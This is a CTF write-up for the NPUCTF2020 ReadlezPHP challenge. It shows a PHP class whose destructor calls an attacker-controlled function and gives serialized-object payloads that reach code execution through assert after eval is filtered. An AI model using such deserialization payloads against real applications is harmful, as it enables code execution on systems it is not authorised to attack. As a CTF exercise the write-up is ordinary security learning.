当前位置:网站首页>[NPUCTF2020]ReadlezPHP
[NPUCTF2020]ReadlezPHP
2022-07-06 11:32:00 【Her&mes】
WP
If there is any wrong , Also please correct me
Enter the target environment , Go through the process :
1. Look at the source code
2. Manually try to access several common web page names ,
3. use dirsearch Scan website .
Find a link directly in the source code :
<p> Millions of front-end NPU The time center tells you the time :<a href="./time.php?source"></a></p>
visit /time.php?source
, Now enter the subject gate , White box audit , It seems to be a relatively simple deserialization
White box code :
<?php
#error_reporting(0);
class HelloPhp
{
public $a;
public $b;
public function __construct(){
$this->a = "Y-m-d h:i:s";
$this->b = "date";
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
$c = new HelloPhp;
if(isset($_GET['source']))
{
highlight_file(__FILE__);
die(0);
}
@$ppp = unserialize($_GET["data"]);
Try to construct payload
/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:4:"eval";}
And then there's no then , Page echo “500, Unable to process request ”, I have no more , There's a filter , Then change the code , structure payload
/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:12:"var_dump(10)";s:1:"b";s:4:"eval";}
Same as before , Unable to process request , But var_dump() Generally speaking, it should not be filtered , May be eval Filtered , Switch to assert try
/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:12:"var_dump(10)";s:1:"b";s:6:"assert";}
success , Page echo int(10) 2021-04-07 12:39:47
hold var_dump(10) Switch to phpinfo(),( Remember to change the size ), very good ,phpinfo Not filtered , see disable_functions bar , It's filtered out system,exec,shell_exec
Try searching again flag,ohhhhhhhhhh, There are ( If this is empty … On the importance of good habits ).
PS:assert from 7.2 Strings are no longer supported at first => Cannot perform PHP Code. ( This topic is in BUU On is PHP/7.0.33)
边栏推荐
- Learn winpwn (2) -- GS protection from scratch
- Neo4j installation tutorial
- Kept VRRP script, preemptive delay, VIP unicast details
- 2019腾讯暑期实习生正式笔试
- 误删Path变量解决
- QT creator support platform
- 分布式節點免密登錄
- Codeforces Round #771 (Div. 2)
- Valentine's Day flirting with girls to force a small way, one can learn
- AcWing 179. Factorial decomposition problem solution
猜你喜欢
Cookie setting three-day secret free login (run tutorial)
分布式節點免密登錄
Neo4j installation tutorial
error C4996: ‘strcpy‘: This function or variable may be unsafe. Consider using strcpy_ s instead
[download app for free]ineukernel OCR image data recognition and acquisition principle and product application
Use dapr to shorten software development cycle and improve production efficiency
Word排版(小计)
{一周总结}带你走进js知识的海洋
MySQL与c语言连接(vs2019版)
Valentine's Day flirting with girls to force a small way, one can learn
随机推荐
Software testing and quality learning notes 3 -- white box testing
库函数--(持续更新)
Knowledge Q & A based on Apache Jena
wangeditor富文本引用、表格使用问题
【flink】flink学习
[Blue Bridge Cup 2017 preliminary] buns make up
快来走进JVM吧
QT creator runs the Valgrind tool on external applications
Summary of numpy installation problems
L2-006 tree traversal (25 points)
When you open the browser, you will also open mango TV, Tiktok and other websites outside the home page
L2-004 is this a binary search tree? (25 points)
Word排版(小计)
數據庫高級學習筆記--SQL語句
What does BSP mean
AcWing 179. Factorial decomposition problem solution
double转int精度丢失问题
分布式节点免密登录
L2-007 family real estate (25 points)
error C4996: ‘strcpy‘: This function or variable may be unsafe. Consider using strcpy_s instead